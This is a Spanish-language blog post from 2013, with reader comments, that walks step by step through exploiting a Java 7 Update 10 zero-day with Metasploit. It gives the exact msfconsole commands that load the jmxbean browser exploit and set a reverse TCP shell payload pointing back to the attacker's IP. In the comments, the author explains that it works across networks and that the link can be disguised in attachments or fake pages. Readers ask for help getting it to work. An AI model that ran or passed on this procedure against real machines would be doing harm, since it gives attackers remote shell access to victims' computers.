viernes, 11 de enero de 2013

Exploiting New Java 0-day with Metasploit


Se ha descubierto una nueva vulnerabilidad (0-day) en las versiones de Java 7 Update 10 y anteriores, que permite a un atacante ejecutar código arbitrario en cualquier sistema operativo que cuente con esta version de Java. Actualmente esta versión es la ultima actualización  por lo tanto el 90% de los usuarios de Internet lo tienen instalado y el 50% de estos no tienen conocimiento sobre el riesgo que pueden estan corriendo.

Muy aparte, el equipo de Metasploit ha desarrollado un modulo que permite a un atacante vulnerar de una forma remota cualquier sistema operativo, ya sea Windows 8, 7, Vista y XP como tambien cualquier navegador ya sea Internet Explorer 10 y anteriores, Google Chorme, Firefox, Opera y Safari ya que tener instalado y habilitado Java en el ordenador esta se ejecuta totalmente en el sistema.

A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.

REQUERIMIENTOS:

BackTrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 - 8 (Victima)
Java 7 Update 10 (Victima)

PROCEDIMIENTOS:

En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jmxbean
set payload java/shell_reverse_tcp
set lhost 192.168.1.33
set srvhost 192.168.1.33
set uripath /
exploit
-------------------------------------------------------------------------------------------------------------



Estos comandos crearan una URL con nuestra IP en la que contiene los archivos maliciosos que la victima tendrá que ejecutar desde su navegador, la cual metasploit enviara los siguientes archivos tratando de vulnerar el sistema:


Si nuestro exploit detecta que el sistema es vulnerable y los archivos enviados se logran ejecutar exitosamente en el navegador, esta devolverá una conexión entre nuestro ordenador y el sistema vulnerado.



CONCLUSIÓN:

Se recomienda a todos los usuarios desactivar totalmente el Java del sistema para no ser victima de estos ataques tan peligrosos que pueden comprometer nuestra informacion.

11 comentarios:

  1. Failed to load module: exploit/multi/browser/java_jre17_jmxbean
    m getting this error...m using latest msf version and it has no new updates available :( so y m getting such error?

    ResponderEliminar
  2. Muy bueno y muy bien explicado maquina.

    ATTE: BTshell.

    ResponderEliminar
  3. Hola que tal Caleb, tengo una duda, el atacante podría comprometer mi información siempre y cuando:
    1) Tenga instalada esta versión en mi equipo
    2) Ejecute en mi equipo el link (http://192.168.1.33:8080)
    No es así, por lo que me queda una duda, esto no funcionaria si no estoy en la misma red que el atacante?? es decir, si x persona crea el codigo malicioso, pero esta en su propia red y yo estoy en mi propia red, aunque me enviara el enlace y yo lo ejecute, no funcionaría?? En todo caso tendría que ser una IP fija la del atacante, no es así??

    ResponderEliminar
    Respuestas
    1. Hola Cash,

      Con respecto a tus preguntas, las respuestas son las siguientes:

      1) La PC victima tiene que tener habilitado Java v7 update 10 u anteriores para que el exploit funcione.
      2) Tienes que abrir el LINK que el atacante envia http://su-ip/ para que el exploit se ejecute.
      3) Estes o no estes en su RED, esto funciona! ya que el exploit esta programado para funcionar dentro y fuera de tu RED.

      Ojo, ten cuidado, que el atacante no tan solo puede enviar el LINK malicioso con su IP, tambien te lo puede enviar en archivos adjuntados, paginas fakes u enlances que cubren su IP.

      Espero haberte ayudado, saludos.

      Eliminar
    2. Gracias por tu pronta respuesta Caleb, habrá que estar mas al pendiente de lo que nos llega...

      Eliminar
  4. Hola Caleb , podrías decirnos como configurar el SRVHOST ?
    El caso es que cuando pongo mi IP publica en set SRVHOST "IP publica" me dice que esta ocupada y no me deja hacerlo.
    He leido por internet que tengo que configurar el virtual host en el router para que redireccione directamente la informacion , pero ya lo he hecho y me sigue sin funcionar.


    Un saludo

    ResponderEliminar
  5. eso pasa porque estas usando la configuracion srvhost en un mismo equipo o servidor donde ya tienes habilitado el puerto 8080 u 80 pruebalo en otro equipo dentro de tu misma red local

    ResponderEliminar
  6. disculpa abra alguna manera de combinar este ataque con una clonacion de pagina como en SET es que a mi no me funciona esa herramienta y queria saber si existe la posibilidad de hacerlo mismo manualmente sin usar SET

    ResponderEliminar
  7. Muchas gracias, ¿Algún otro método?

    ResponderEliminar